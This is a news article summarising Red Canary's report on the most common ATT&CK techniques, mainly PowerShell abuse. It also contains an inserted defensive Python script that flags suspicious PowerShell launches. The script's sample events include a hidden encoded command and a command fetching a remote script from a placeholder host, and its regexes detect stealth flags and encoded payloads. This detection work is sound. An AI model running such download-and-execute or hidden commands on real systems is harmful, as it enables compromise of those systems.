    Hackers Are Loving PowerShell, Study Finds

March 27, 2019


    Threat Actors Prefer PowerShell over Other ATT&CK Techniques, Report Shows

    PowerShell is by far the most prevalent MITRE ATT&CK technique, being detected twice as often as the next most common technique, says a new report from cybersecurity firm Red Canary. 

Data gathered from 10,000 confirmed threats reveals that PowerShell, scripting, Regsvr32, connection proxy, spearphishing attachments and masquerading were the most prevalent techniques, as described in MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework, according to Red Canary’s just-released Threat Detection Report.

    The detections are drawn from endpoints at hundreds of organizations over five years, Red Canary told SecurityWeek. Roughly 10,000 additional detections associated with unwanted software such as adware were left out of the report. 

The reason PowerShell is so prevalent is quite clear: it has been included in essentially every Windows operating system by default for a decade, provides access to the Windows API, and is rarely constrained, thus allowing adversaries to perform administrative and automation tasks without risking being blocked.

    With PowerShell libraries readily available, implementations can take advantage of the full functionality of PowerShell within arbitrary processes. The open-source and cross-platform availability of PowerShell has resulted in the creation of tools capable of building payloads to target Windows, macOS, and Linux in new, unpredictable ways, the report (PDF) points out. 

    Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources using various network protocols, encode payloads passed via the command line, or load PowerShell into other processes. 

    Adversaries known to leverage the technique in their attacks include Turla, which uses a post-infection executable to load malicious PowerShell scripts directly into memory. The Cobalt hackers too are known for the use of multiple instances of PowerShell in the later stages of their attacks. 

A look at the top ten ATT&CK techniques by industry shows that PowerShell has been used in attacks across 15 verticals, including the communication, education, energy, financial, government, health, and media industries. In all cases, it is either the most common or among the top three most commonly used techniques.

    “PowerShell is here to stay for administrators and adversaries alike, and those organizations that learn to defend against malicious uses of it will have a distinct advantage. Defending against PowerShell will require not just baselining and an understanding of changes in the ways adversaries use the tool, but defenders will also have to maintain intelligence related to a wide and changing variety of PowerShell attack tools,” Red Canary says.
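To make the baselining advice above concrete alongside the command-line encoding the article mentions, here is an added example (not code from the article or from Red Canary's report) in Python: a small triage routine run over constructed process-creation events that flags PowerShell launches from parents outside a baseline, decodes -EncodedCommand payloads so analysts can read them, and notes stealth flags and remote-resource references. The baseline parent set, the sample events and the example.test URL are assumptions.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688
# style: parent image, image, command line). Not taken from the report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -enc RwBlAHQALQBEAGEAdABlAA=="},
    {"parent": "svchost.exe", "image": "pwsh.exe",
     "cmd": 'pwsh.exe -c "iwr https://example.test/x.ps1"'},
]

# Assumed baseline: parents that legitimately spawn PowerShell in this
# hypothetical environment. Anything else deserves a look.
BASELINE_PARENTS = {"explorer.exe", "cmd.exe", "svchost.exe", "taskeng.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
# Flags that suppress profiles, hide the window, or bypass execution policy.
STEALTH_RE = re.compile(
    r"(?i)-(?:nop\w*|w(?:indowstyle)?\s+hidden|ep?\s+bypass|ex\w*\s+bypass)")


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage(events, baseline=BASELINE_PARENTS):
    """Findings for PowerShell launches that deviate from the parent baseline
    or carry encoded, stealth, or remote-resource indicators."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in POWERSHELL_IMAGES:
            continue
        reasons = []
        if ev["parent"].lower() not in baseline:
            reasons.append(f"unusual parent {ev['parent']}")
        decoded = decode_encoded_command(ev["cmd"])
        if decoded is not None:
            reasons.append(f"encoded command -> {decoded!r}")
        if STEALTH_RE.search(ev["cmd"]):
            reasons.append("stealth flags (NoProfile/Hidden/Bypass)")
        if re.search(r"(?i)https?://", ev["cmd"]):
            reasons.append("remote resource referenced")
        if reasons:
            findings.append({"cmd": ev["cmd"], "reasons": reasons})
    return findings
```

The decoded text is what a script block log would show; with only command-line logging, decoding it yourself is the difference between an opaque base64 blob and a readable finding.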

Breakthroughs in methods for escaping script-host constraints on Windows and macOS, the report reveals, have created new opportunities for actors looking to leverage scripting as part of their attacks. In addition to WScript and CScript, the default scripting binaries on Windows systems, other applications can also execute scripts, including SXSL and WMIC, which expands the attack surface.

The Chinese cyber-espionage group known as APT1 is known for the use of batch scripts in the early reconnaissance phase of its attacks, to gather system information, enumerate running services and processes, list accounts with administrative privileges, and gather other data. The Smoke Loader Trojan uses a Visual Basic script to ensure persistence.

    Regsvr32.exe, a trusted component of the Windows platform, provides attackers with the means to execute native code or scripts, either by leveraging local resources or by loading them from a remote location. The state-sponsored espionage group Ocean Lotus and the espionage group APT19 are known for the use of regsvr32 in their attacks. 

    Used to direct network traffic between systems or act as intermediaries for network communications, connection proxies are used to obscure the identity or location of adversaries. Prominent examples of threat actors leveraging the technique include Duqu and APT10, both focused on espionage attacks. 

    Spearphishing attachment, the form of spearphishing that employs malware attached to an email, is a simple and effective technique that attackers can leverage for code execution.  It allows for the use of multiple file types, thus providing the attackers with the flexibility of targeting the various applications that handle specific document types.

With virtually everyone having at least an email address, phishing provides attackers with a nearly unlimited array of potential targets. The technique relies on the victim’s trust to achieve its malicious intent, though there are also numerous tools available to prevent malicious attachments from reaching the victim’s inbox.

    The technique, Red Canary points out, has been a particularly prolific tool among governments seeking to surveil supposed dissidents, as exemplified in Citizen Lab’s report last year on the targeting of Tibetan activists. The Leviathan (TEMP.Periscope) group has engaged in numerous attacks targeting defense contractors, universities with military research ties, law firms, and government agencies. 

    The Carbanak group too is believed to have leveraged spearphishing attachments as the initial infection vector in some of its attacks. 

    Masquerading, another prevalent MITRE ATT&CK technique, relies on manipulating the name or location of an executable to evade defensive technology or deceive potential victims. The $80 million heist from Bangladesh Bank leveraged the technique, as did the Calisto macOS Trojan that remained hidden for two years. 

Credential Dumping, Registry Run Keys / Start Folder, Rundll32, and Service Execution rounded out the top 10 techniques, Red Canary says. All of these techniques, and tens of others used less frequently, are here to stay, and they are also expected to evolve as attackers become more creative and discover new ways to leverage them.

    Ionut Arghire is an international correspondent for SecurityWeek.
